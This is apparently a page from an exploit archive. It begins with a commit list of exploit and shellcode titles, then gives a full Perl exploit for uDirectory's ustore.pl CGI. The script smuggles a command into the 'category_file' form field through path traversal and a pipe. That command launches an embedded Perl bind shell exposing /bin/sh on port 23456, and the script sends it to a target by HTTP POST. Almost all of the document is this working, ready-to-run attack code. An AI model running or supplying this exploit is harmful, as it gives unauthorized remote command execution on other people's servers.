
14991 changes to exploits/shellcodes HTC Touch - vCard over IP Denial of Service TeamSpeak 3.0.0-beta25 - Multiple Vulnerabilities PeerBlock 1.1 - Blue Screen of Death WS10 Data Server - SCADA Overflow (PoC) Symantec Endpoint Protection 12.1.4013 - Service Disabling Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Memcached 1.4.33 - 'Crash' (PoC) Memcached 1.4.33 - 'Add' (PoC) Memcached 1.4.33 - 'sasl' (PoC) Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow man-db 2.4.1 - 'open_cat_stream()' Local uid=man CDRecord's ReadCD - '$RSH exec()' SUID Shell Creation CDRecord's ReadCD - Local Privilege Escalation Anyburn 4.3 x86 - 'Copy disc to image file' Buffer Overflow (Unicode) (SEH) FreeBSD - Intel SYSRET Privilege Escalation (Metasploit) CCProxy 6.2 - 'ping' Remote Buffer Overflow Savant Web Server 3.1 - Remote Buffer Overflow (2) Litespeed Web Server 4.0.17 with PHP (FreeBSD) - Remote Overflow Alcatel-Lucent (Nokia) GPON I-240W-Q - Buffer Overflow QNAP TS-431 QTS < 4.2.2 - Remote Command Execution (Metasploit) Imperva SecureSphere 13.x - 'PWS' Command Injection (Metasploit) Drupal < 8.5.11 / < 8.6.10 - RESTful Web Services unserialize() Remote Command Execution (Metasploit) Oracle Weblogic Server - Deserialization Remote Command Execution (Patch Bypass) TeamCity < 9.0.2 - Disabled Registration Bypass OpenSSH SCP Client - Write Arbitrary Files Kados R10 GreenBee - Multiple SQL Injection WordPress Core 5.0 - Remote Code Execution phpBB 3.2.3 - Remote Code Execution Linux/x86 - Create File With Permission 7775 + exit() Shellcode (Generator) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(/bin/ash_NULL_NULL) + XOR Encoded Shellcode (58 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/csh__ [/bin/csh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/ksh__ [/bin/ksh_ NULL]) + XOR Encoded Shellcode (53 bytes) Linux/x86 - setreuid(0_0) + execve(_/bin/zsh__ [/bin/zsh_ NULL]) + XOR Encoded Shellcode (53 bytes)
107 lines
No EOL
3.5 KiB
Perl
Executable file
107 lines
No EOL
3.5 KiB
Perl
Executable file
source: https://www.securityfocus.com/bid/2884/info
|
|
|
|
uDirectory is an online directory and listing management system.
|
|
|
|
An input validation error exists in uDirectory that may allow remote users to execute arbitrary commands on a host running the software.
|
|
|
|
#!/usr/bin/perl -w
|
|
# management, e-commerce ... blah...
|
|
# exploit by Igor Dobrovitski noident@my-deja.com
|
|
# This program will spawn /bin/sh on server's port 23456 and tell you if it thinks it succeded
|
|
# Enjoy
|
|
use Socket;
|
|
$| = 1;
|
|
####################################################################################################
|
|
$exec_code = 'use Socket;$protocol = getprotobyname(tcp);socket(SOCK, PF_INET, SOCK_STREAM, $protocol);setsockopt(SOCK,
|
|
SOL_SOCKET, SO_REUSEADDR, 1);$port=23456;bind(SOCK, sockaddr_in($port, INADDR_ANY));listen(SOCK, 1);accept (NEW,
|
|
SOCK);if(!fork()){open STDIN, "<&NEW"; open STDOUT, ">&NEW";open STDERR, ">&NEW";exec "/bin/sh -i"}else{close NEW;exit;}';
|
|
####################################################################################################
|
|
unless(defined $ARGV[0]) {die "Usage: $0 www.example.com/cgi-bin/ustore.pl\n"}
|
|
($host, $scriptpath) = $ARGV[0] =~ m|^(.*?)(/.*)$|;
|
|
print "Engaging the enemy. Please stand by...\n";
|
|
foreach my $perl_path ('/usr/bin/perl', '/usr/local/bin/perl')
|
|
{
|
|
print "Trying $perl_path\n\n";
|
|
my $cmd = $perl_path . ' -e \'' . $exec_code . '\'|';
|
|
for(my $i=1;$i<=10;$i++)
|
|
{
|
|
print "try $i\n";
|
|
$cmd = '/..' . $cmd;
|
|
$form = makeform({'category_file' => $cmd, 'MAIN_FIELD' => 'blah',
|
|
'command' => 'add_new_listing' });
|
|
my @reply = &send($form);
|
|
}
|
|
}
|
|
&oops_the_sploit_did_not_work();
|
|
|
|
sub makeform
|
|
{
|
|
my $string;
|
|
my @blah;
|
|
my $line = '';
|
|
my $here;
|
|
my %data = %{$_[0]};
|
|
foreach my $key (keys %data)
|
|
{
|
|
$line .= "$key" . 'AAAA' . "$data{$key}" . 'BBBB';
|
|
}
|
|
$line =~ s|^(.*)BBBB$|$1|;
|
|
$line =~ s/\\n/\n/g;
|
|
$line =~ s/\\t/\t/g;
|
|
$line =~ s/\\e/\e/g;
|
|
$line =~ s/\\f/\f/g;
|
|
$line =~ s/\\r/\r/g;
|
|
$line =~ s/\\0/\0/g;
|
|
foreach my $char (split //, $line)
|
|
{
|
|
if($char !~ m/[A-Za-z0-9._ ]/)
|
|
{
|
|
$char = unpack "H2", $char;
|
|
$char = '%' . "$char";
|
|
}
|
|
push @blah, $char;
|
|
}
|
|
$string = join "",@blah;
|
|
$string =~ s/AAAA/=/g;
|
|
$string =~ s/BBBB/&/g;
|
|
$string =~ s/ /+/g;
|
|
my $cont_len = length($string);
|
|
$here = <<EOF;
|
|
POST $scriptpath HTTP/1.0
|
|
User-Agent: Mozilla (Windows 98)
|
|
Host: $host
|
|
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, image/png, */*
|
|
Accept-Encoding: gzip
|
|
Accept-Language: en
|
|
Accept-Charset: iso-8859-1,*,utf-8
|
|
Content-type: application/x-www-form-urlencoded
|
|
Content-length: $cont_len
|
|
|
|
$string
|
|
EOF
|
|
return $here;
|
|
}
|
|
|
|
sub send
|
|
{
|
|
my $form_to_send = shift;
|
|
my $h = inet_aton($host) or die "Forward lookup for $host failed\n";
|
|
socket(S,PF_INET,SOCK_STREAM,6) or die "socket prolems\n";
|
|
unless(connect(S,sockaddr_in(80,$h))) {print STDERR "Couldn't connect to " . inet_ntoa($h) . "\n"; close(S); exit 1 }
|
|
select(S);
|
|
$|=1;
|
|
print "$form_to_send";
|
|
local $SIG{ALRM} = sub { print STDERR "Timeout was expected. The shell awaits you on port 23456\nBe good and hack
|
|
wisely.\n"; exit };
|
|
alarm(20);
|
|
my @reply=<S>;
|
|
select(STDOUT);
|
|
close(S);
|
|
return @reply;
|
|
}
|
|
|
|
sub oops_the_sploit_did_not_work
|
|
{
|
|
print STDERR "The exploit didn't work on this host\nSorry...\n";
|
|
exit;
|
|
} |